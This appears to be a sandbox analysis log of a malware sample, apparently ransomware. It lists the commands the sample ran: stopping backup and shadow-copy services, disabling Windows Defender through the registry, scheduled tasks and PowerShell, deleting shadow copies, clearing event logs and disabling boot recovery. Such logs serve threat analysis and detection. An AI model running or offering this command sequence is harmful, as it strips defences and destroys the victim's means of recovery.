net.exe stop "vmicvss" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "vmicvss" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "VSS" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "VSS" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "wbengine" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "wbengine" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "WebClient" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "WebClient" /y

C:\Windows\SYSTEM32\net.exe

net.exe stop "UnistoreSvc_12cc1" /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop "UnistoreSvc_12cc1" /y

C:\Windows\SYSTEM32\sc.exe

sc.exe config "SamSs" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "SDRSVC" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "SstpSvc" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "UI0Detect" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "vmicvss" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "VSS" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "wbengine" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "WebClient" start= disabled

C:\Windows\SYSTEM32\sc.exe

sc.exe config "UnistoreSvc_12cc1" start= disabled

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\SYSTEM32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable

C:\Windows\SYSTEM32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable

C:\Windows\SYSTEM32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable

C:\Windows\SYSTEM32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable

C:\Windows\SYSTEM32\schtasks.exe

schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\reg.exe

reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SYSTEM32\vssadmin.exe

vssadmin.exe delete shadows /all /quiet

C:\Windows\SYSTEM32\wevtutil.exe

wevtutil.exe cl system

C:\Windows\SYSTEM32\wevtutil.exe

wevtutil.exe cl security

C:\Windows\SYSTEM32\wevtutil.exe

wevtutil.exe cl application

C:\Windows\System32\Wbem\wmic.exe

wmic.exe SHADOWCOPY /nointeractive

C:\Windows\System32\Wbem\wmic.exe

wmic.exe shadowcopy delete

C:\Windows\SYSTEM32\bcdedit.exe

bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\SYSTEM32\bcdedit.exe

bcdedit.exe /set {default} recoveryenabled no

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Program Files\Windows Defender\MpCmdRun.exe

"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIOAVProtection $true

C:\Windows\SYSTEM32\cmd.exe

cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableRealtimeMonitoring $true

Network

Country Destination Domain Proto
US 52.109.12.20:443 tcp
US 8.8.8.8:53 time.windows.com udp
NL 20.101.57.9:123 time.windows.com udp

Files
